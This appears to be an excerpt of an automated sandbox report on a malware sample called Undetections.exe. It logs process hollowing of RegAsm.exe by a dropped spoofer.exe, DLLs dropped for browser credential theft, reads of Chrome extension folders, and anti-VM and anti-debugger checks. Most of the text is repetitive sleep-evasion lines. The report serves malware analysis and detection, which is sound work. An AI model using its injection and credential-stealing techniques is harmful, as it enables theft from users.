                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 593985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 593860Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeWindow / User API: threadDelayed 1854Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeWindow / User API: threadDelayed 7956Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 5.4 %
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599808s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599688s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599563s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599445s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599329s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599204s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -599079s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598954s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598829s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598704s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598579s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598454s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598329s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598204s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -598086s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597969s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597725s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -597110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -596110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -595110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594860s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594735s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594610s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594485s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594360s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594235s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -594110s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -593985s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exe TID: 7488Thread sleep time: -593860s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe TID: 7644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410250 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410382h4_2_00410250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00401120 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,4_2_00401120
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040D200
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416370 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,4_2_00416370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A410
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417420 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00417420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00416BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00416BC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040AF10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417010 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,4_2_00417010
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0040A860
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004167B0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,4_2_004167B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410420 GetSystemInfo,wsprintfA,4_2_00410420
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599808Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599688Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599563Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599445Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599329Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599204Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 599079Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598954Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598829Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598704Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598579Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598454Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598329Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598204Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 598086Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597969Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597725Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 597110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 596110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594860Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594735Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594610Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594485Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594360Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594235Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 594110Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 593985Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeThread delayed: delay time: 593860Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwared
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Undetections.exe, 00000000.00000002.4106624538.0000000005BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_4-72560
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A55F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041A55F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00418460 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418460
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00410080 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,4_2_00410080
                          Source: C:\Users\user\Desktop\Undetections.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041A55F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041A55F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F638 SetUnhandledExceptionFilter,4_2_0041F638
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041BA87 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041BA87
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_69D8AC62
                          Source: C:\Users\user\Desktop\Undetections.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Allocates memory in foreign processes
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeCode function: 2_2_031724AD CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,2_2_031724AD
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                          Searches for specific processes (likely to inject)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00411AB0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_00411AB0
                          Writes to foreign memory regions
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9C7008Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeProcess created: C:\Users\user\AppData\Roaming\Undetections\spoofer.exe "C:\Users\user\AppData\Roaming\Undetections\spoofer.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\Undetections\spoofer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69DD4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,4_2_69DD4760
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D8AE71 cpuid 4_2_69D8AE71
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_00410250
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,LocalFree,4_2_004102C9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Users\user\Desktop\Undetections.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Undetections.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
